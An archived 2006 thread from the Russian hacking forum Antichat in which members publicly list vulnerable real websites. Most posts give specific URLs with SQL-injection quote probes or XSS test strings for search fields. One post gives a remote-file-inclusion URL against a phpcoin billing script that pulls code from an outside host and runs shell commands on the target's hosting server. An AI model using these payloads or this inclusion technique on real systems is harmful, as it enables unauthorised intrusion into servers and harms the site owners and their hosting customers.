ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.01.2006, 18:04
|
|
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839
Репутация:
212
|
|
Баги на сайтах.
Очень часто создаются темы типа: Нашел XSS, Нашёл SQL injection. Уже немного надоело. Предлагаю всем найденные вами баги (если вам не терпится показать этот баг всем) постить в эту тему, чтобы не засорять форум!
UPD: никаких рефереров! все линки даем исключительно так _http://
Последний раз редактировалось m0nzt3r; 16.05.2006 в 11:12..
|
|
|
28.01.2006, 18:12
|
|
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839
Репутация:
212
|
|
http://www.generis.ru/?page=press_wholenews&id='
http://www.integracija.gov.lv/forum/?setc=1&forumid='
http://www.mossei.ru/?page='
Вот для начала
|
|
|
|
28.01.2006, 18:13
|
|
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281
Репутация:
23
|
|
Идея хорошая принципы .
_www.pansionmsu.ru , в строке поиска <script>alert()<script>
_http://msu.ru/ , в строке поиска , <script>alert()<script> не вышел , а <marquee>msu</marquee> выходит .
_http://online.ua/ Строка поиска , <marquee>UA</marquee> , <img src="http://www.online.ua/all/0.gif"> покажет свой собственный логотип который в верхнем левом углу . |
|
|
|
29.01.2006, 00:44
|
|
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281
Репутация:
23
|
|
_http://referat.star-info.ru
В поиске если написать <i>i</i> то будет так
Warning: eregi_replace(): REG_EMPTY in /usr/home/www/user/referat.star-info.ru/inc/func on line 73
|
|
|
|
15.02.2006, 00:06
|
|
Новичок
Регистрация: 13.02.2006
Сообщений: 24
Провел на форуме:
138596
Репутация:
3
|
|
www.supersait.net.ru/billing/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id
сам сайт supersait.net.ru нечего из себя не представляет, зато он хостится на очень известном хостинге, до которого можно добраться используя багу в phpcoin.
Тоесть благодаря php include мы можем выполнять никсовые комманды (ls;pwd;echo;cat) на сервере.
|
|
|
|
01.03.2006, 01:21
|
|
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281
Репутация:
23
|
|
_http://vidahl.agava.ru/cgi-bin/dic.cgi?search=%3Ci%3Ei%3C%2Fi%3E&method=exact
В графе поиск статьи <script>alert()</script>
|
|
|
|
01.03.2006, 19:35
|
|
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281
Репутация:
23
|
|
Справочник телефонов города Орла
http://www.g-play.ru/orel/
"Поиск организаций по названию, виду деятельности:"
В поиске <script>alert()</script>
|
|
|
|
01.03.2006, 19:56
|
|
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281
Репутация:
23
|
|
Еще .
1)
url : _http://prohosting.fatpickle.com/search
<script>alert()</script> в поиске .
2)
Url: _http://www.babr.ru/index.php?pt=pages
<script>alert()</script> в поиске .
3)
url : _http://www.ambercity.ru/
<script>alert()</script> в поиске .
|
|
|
|
02.03.2006, 01:38
|
|
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281
Репутация:
23
|
|
1)
Url :_http://www.cityvision2000.com
Можно узнать путь установки .
В поиске <script>alert()</script>
"D:\Webs\city\www\search.cgi": No such file or directory
2)
url: _http://www.pages.ru/
Поиск <script>alert()</script>
|
|
|
|
03.03.2006, 19:25
|
|
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
Провел на форуме:
9751364
Репутация:
1847
|
|
_http://zna.nu/vg_eng.php?id='
Интересный сайт  |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
